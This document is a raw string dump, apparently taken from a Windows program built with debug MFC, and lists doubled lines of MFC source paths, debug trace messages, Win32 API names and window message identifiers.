HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
Implementation Warning: control notification = $%X.
Implementation Warning: control notification = $%X.
Warning: not executing disabled command %d
Warning: not executing disabled command %d
hWnd = $X (nIDC=$X) is not a %hs.
hWnd = $X (nIDC=$X) is not a %hs.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h
commctrl_DragListMsg
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdlgs.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdlgs.inl
CCmdTarget
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp
SENDING control notification %d from control id 0xX to %hs window.
SENDING control notification %d from control id 0xX to %hs window.
SENDING command id 0xX to %hs target.
SENDING command id 0xX to %hs target.
No handler for command ID 0xX, disabling it.
No handler for command ID 0xX, disabling it.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp
m_nMsgLast =
m_nMsgLast =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp
MRU: open file (%d) '%s'.
MRU: open file (%d) '%s'.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp
Error: failed to load message box prompt string 0xx.
Error: failed to load message box prompt string 0xx.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Error: no data exchange control with ID 0xX.
Error: no data exchange control with ID 0xX.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
Warning: dialog data checkbox value (%d) out of range.
Warning: dialog data checkbox value (%d) out of range.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
m_ps.rcPaint =
m_ps.rcPaint =
m_ps.fErase =
m_ps.fErase =
m_ps.hdc =
m_ps.hdc =
lgpn.lopnColor =
lgpn.lopnColor =
lgpn.lopnWidth.x (width) =
lgpn.lopnWidth.x (width) =
lgpn.lopnStyle =
lgpn.lopnStyle =
lb.lbColor =
lb.lbColor =
lb.lbHatch =
lb.lbHatch =
lb.lbStyle =
lb.lbStyle =
lf.lfFaceName =
lf.lfFaceName =
lf.lfPitchAndFamily =
lf.lfPitchAndFamily =
lf.lfQuality =
lf.lfQuality =
lf.lfClipPrecision =
lf.lfClipPrecision =
lf.lfOutPrecision =
lf.lfOutPrecision =
lf.lfCharSet =
lf.lfCharSet =
lf.lfStrikeOut =
lf.lfStrikeOut =
lf.lfUnderline =
lf.lfUnderline =
lf.lfItalic =
lf.lfItalic =
lf.lfWeight =
lf.lfWeight =
lf.lfOrientation =
lf.lfOrientation =
lf.lfEscapement =
lf.lfEscapement =
lf.lfWidth =
lf.lfWidth =
lf.lfHeight =
lf.lfHeight =
bm.bmBitsPixel =
bm.bmBitsPixel =
bm.bmPlanes =
bm.bmPlanes =
bm.bmWidthBytes =
bm.bmWidthBytes =
bm.bmWidth =
bm.bmWidth =
bm.bmHeight =
bm.bmHeight =
bm.bmType =
bm.bmType =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp
CLSID\%s
CLSID\%s
Interface\%s
Interface\%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp
mfcm100d.dll
mfcm100d.dll
QueryInterface(%s) failed
QueryInterface(%s) failed
QueryInterface(%s) succeeded
QueryInterface(%s) succeeded
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp
AppMsg
AppMsg
WinMsg
WinMsg
CmdRouting
CmdRouting
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
shell32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrmx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrmx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.
Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdatarecovery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdatarecovery.cpp
lXXxXXXXXXXX
lXXxXXXXXXXX
RegDeleteKeyExA
RegDeleteKeyExA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp
%s:%x:%x:%x:%x
%s:%x:%x:%x:%x
Shell32.dll
Shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp
0xx
0xx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp
IOleInPlaceObject not supported on OLE control (dialog ID %d).
IOleInPlaceObject not supported on OLE control (dialog ID %d).
Persistence not supported on OLE control %ls.
Persistence not supported on OLE control %ls.
%d. Column ordinal %d: Binding as native data type
%d. Column ordinal %d: Binding as native data type
%d. Column ordinal %d: Binding a COM object
%d. Column ordinal %d: Binding a COM object
F%d. Column ordinal %d: Binding as an IStream object
F%d. Column ordinal %d: Binding as an IStream object
%d. Column ordinal %d: Binding as an ISequentialStream object
%d. Column ordinal %d: Binding as an ISequentialStream object
neither ISequentialStream nor IStream are supported!
neither ISequentialStream nor IStream are supported!
IStream is supported
IStream is supported
FISequentialStream is supported
FISequentialStream is supported
Testing streams support...
Testing streams support...
%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory
%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory
%d. Column ordinal %d: Binding length and status ONLY
%d. Column ordinal %d: Binding length and status ONLY
Number of columns: %d
Number of columns: %d
f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h
Dw=Binding entry %d failed. Status: %d
Dw=Binding entry %d failed. Status: %d
Unsupported DBTYPE (%d) in column %d
Unsupported DBTYPE (%d) in column %d
$@Column %d not bound
$@Column %d not bound
GetData failed - HRESULT = 0x%X
GetData failed - HRESULT = 0x%X
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbasepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbasepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbar.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbar.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxvisualmanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxvisualmanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcontrolbarutil.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcontrolbarutil.h
%sMFCToolBar-%d%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBar-%d
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsettingsstore.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsettingsstore.h
%sMFCToolBarParameters
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
TOOLBAR_RESETKEYBAORD
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenu.cpp
&%d %s
&%d %s
Can't import menu
Can't import menu
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin4.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin4.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertoolsmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertoolsmanager.cpp
Too many user-defined tools. The max. number is %d
Too many user-defined tools. The max. number is %d
WM_HOTKEY
WM_HOTKEY
WM_SETHOTKEY
WM_SETHOTKEY
WM_IDLEUPDATECMDUI
WM_IDLEUPDATECMDUI
WM_DDE_EXECUTE
WM_DDE_EXECUTE
WM_KEYLAST
WM_KEYLAST
WM_SYSKEYUP
WM_SYSKEYUP
WM_SYSKEYDOWN
WM_SYSKEYDOWN
WM_KEYUP
WM_KEYUP
WM_KEYDOWN
WM_KEYDOWN
WM_VKEYTOITEM
WM_VKEYTOITEM
WM_CTLCOLORMSGBOX
WM_CTLCOLORMSGBOX
%s: hwnd=0xX, msg = 0xX (0xX, 0xX)
%s: hwnd=0xX, msg = 0xX (0xX, 0xX)
%s: hwnd=0xX, msg = %hs (0xX, 0xX)
%s: hwnd=0xX, msg = %hs (0xX, 0xX)
WM_USER 0xX
WM_USER 0xX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp
%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d
%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d
%s: Execute '%s'.
%s: Execute '%s'.
Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.
Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.
Warning: failed to reclaim %d bytes for memory safety pool.
Warning: failed to reclaim %d bytes for memory safety pool.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp
CFile exception: %hs, File %s, OS error information = %ld.
CFile exception: %hs, File %s, OS error information = %ld.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_u.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_u.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_sp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_sp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfile.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfile.cpp
m_ofn.lpstrCustomFilter =
m_ofn.lpstrCustomFilter =
m_ofn.lpstrFilter =
m_ofn.lpstrFilter =
m_ofn.nFileExtension =
m_ofn.nFileExtension =
m_ofn.nFileOffset =
m_ofn.nFileOffset =
m_ofn.lpstrDefExt =
m_ofn.lpstrDefExt =
m_ofn.Flags =
m_ofn.Flags =
m_ofn.lpstrTitle =
m_ofn.lpstrTitle =
m_ofn.nMaxFileTitle =
m_ofn.nMaxFileTitle =
m_ofn.lpstrFileTitle =
m_ofn.lpstrFileTitle =
m_ofn.nMaxFile =
m_ofn.nMaxFile =
m_ofn.lpstrFile =
m_ofn.lpstrFile =
m_ofn.nFilterIndex =
m_ofn.nFilterIndex =
m_ofn.hwndOwner =
m_ofn.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprop.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprop.cpp
m_psp.dwFlags =
m_psp.dwFlags =
PropertySheet() failed: GetLastError returned %d
PropertySheet() failed: GetLastError returned %d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\barcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\barcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
Warning: could not get volume information '%s'.
Warning: could not get volume information '%s'.
Warning: could not parse the path '%s'. Path is too long.
Warning: could not parse the path '%s'. Path is too long.
Warning: could not parse the path '%s'.
Warning: could not parse the path '%s'.
kernel32.dll
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
Error: failed to execute DDE command '%s'.
Error: failed to execute DDE command '%s'.
Warning: DDE command '%s' ignored because window is disabled.
Warning: DDE command '%s' ignored because window is disabled.
Warning: no message line prompt for ID 0xX.
Warning: no message line prompt for ID 0xX.
Warning: OnUpdateKeyIndicator - unknown indicator 0xX.
Warning: OnUpdateKeyIndicator - unknown indicator 0xX.
Warning: scroll bars in frame windows may cause unusual behaviour.
Warning: scroll bars in frame windows may cause unusual behaviour.
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl3.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl3.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp
Error: failed to load AfxFormatString string 0xx.
Error: failed to load AfxFormatString string 0xx.
Error: illegal string index requested %d.
Error: illegal string index requested %d.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp
ole32.dll
ole32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)
CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp
%sDockingManager-%d
%sDockingManager-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp
CMenuImages. Can't load menu images %x
CMenuImages. Can't load menu images %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp
KeyboardManager
KeyboardManager
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp
MSG_CHECKEMPTYMINIFRAME
MSG_CHECKEMPTYMINIFRAME
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp
Setting of tab order failed, error code: %x
Setting of tab order failed, error code: %x
Registration of tab failed, error code: %x
Registration of tab failed, error code: %x
Creation of tab proxy window failed, error code: %d
Creation of tab proxy window failed, error code: %d
CMDIChildWndEx::SetTaskbarTabProperties failed with code %x
CMDIChildWndEx::SetTaskbarTabProperties failed with code %x
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h
SetTaskbarThumbnailClipRect failed with code %x.
SetTaskbarThumbnailClipRect failed with code %x.
pfnSetIconicThumbnail failed with code %x
pfnSetIconicThumbnail failed with code %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoleipframewndex.cpp
CMDIFrameWndEx
CMDIFrameWndEx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp
Warning: OleInitialize returned scode = %s.
Warning: OleInitialize returned scode = %s.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelltreectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshelllistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmaskededit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlinkctrl.cpp
Can't open URL: %s
Can't open URL: %s
MFCLink_UrlPrefix
MFCLink_UrlPrefix
MFCLink_Url
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxeditbrowsectrl.cpp
Can't load bitmap: %x
Can't load bitmap: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbutton.cpp
Error: unknown image type '%u'
Error: unknown image type '%u'
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbardroptarget.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolbarimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
Can't load bitmap: %s. GetLastError() = %x
Can't load bitmap: %s. GetLastError() = %x
Can't load bitmap: %x. GetLastError() = %x
Can't load bitmap: %x. GetLastError() = %x
CMFCToolBarImages::CopyImageToClipboard error. Error code = %x
CMFCToolBarImages::CopyImageToClipboard error. Error code = %x
Can't create dialog: %s
Can't create dialog: %s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasepane.cpp
DeferWindowPos failded, error code %d
DeferWindowPos failded, error code %d
%sBasePane-%d%x
%sBasePane-%d%x
%sBasePane-%d
%sBasePane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp
